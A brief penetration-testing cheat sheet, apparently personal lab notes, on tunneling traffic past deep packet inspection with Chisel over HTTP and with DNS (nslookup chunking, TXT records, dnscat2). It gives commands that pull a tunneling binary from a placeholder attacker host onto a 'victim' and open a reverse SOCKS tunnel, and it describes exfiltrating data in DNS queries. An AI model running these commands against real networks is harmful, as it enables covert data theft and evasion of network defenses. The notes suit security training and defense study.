HTTP and DNS Tunneling

Sometimes Deep Packet Inspection will force us into tunelling our data through HTTP (SSH tunnels can be prohibited).

Tunneling with Chisel

Encapsulating data stream within HTTP protocol

In order to use Chisel you have to set up Chisel Server (kali) and Chisel Client (victim).

Download the chisel binary from here: https://github.com/jpillora/chisel/releases

Reverse port forwarding

Similar to SSH remote port forwarding

Host the chisel file (kali):

python3 -m http.server 80

Get the chisel (our jumphost):

wget <KALI_IP>/chisel -O /tmp/chisel && chmod +x /tmp/chisel

Execute the client chisel:

chisel client <KALI_IP>:<KALI_PORT> R:socks

Check if server connects to kali (kali):

sudo tcpdump -nvvvXi tun0 tcp port <PORT>

Run chisel server:

chisel server --port <PORT> --reverse

Check if port 1080 is listening:

ss -ntplu

DNS Tunneling

Data exfilration / inflirtation

DNS Server:

Check DNS status:

Flushing the local DNS cache: resolvectl flush-caches

resolvectl status

Set up traffic listener:

sudo tcpdump -i <NETWORK_INTERFACE> udp port 53

Client:

Test resolving names with nslookup:

Query the DNS server directly by appending the serve address: slookup exfiltrated-data.feline.corp 192.168.50.64

nslookup <name.com>

You can exfiltrate data (to dns server) using dns with dividing the data into small chunks and making requests like .

nslookup <data>.name.com

You can infiltrate the data (from dns sever) using txt record.

nslookup -type=txt www.name.corp

DNS Tunneling with dnscat2

Set up dnscat2 (server):

dnscat2-server <name.com>

Connect to dnscat2 (client):

./dnscat <name.com>

Connect to a window:

windows -i 1

Tunneling command:

listen 127.0.0.1:<LOCAL_PORT> <REMOTE_IP>:<REMOTE_PORT>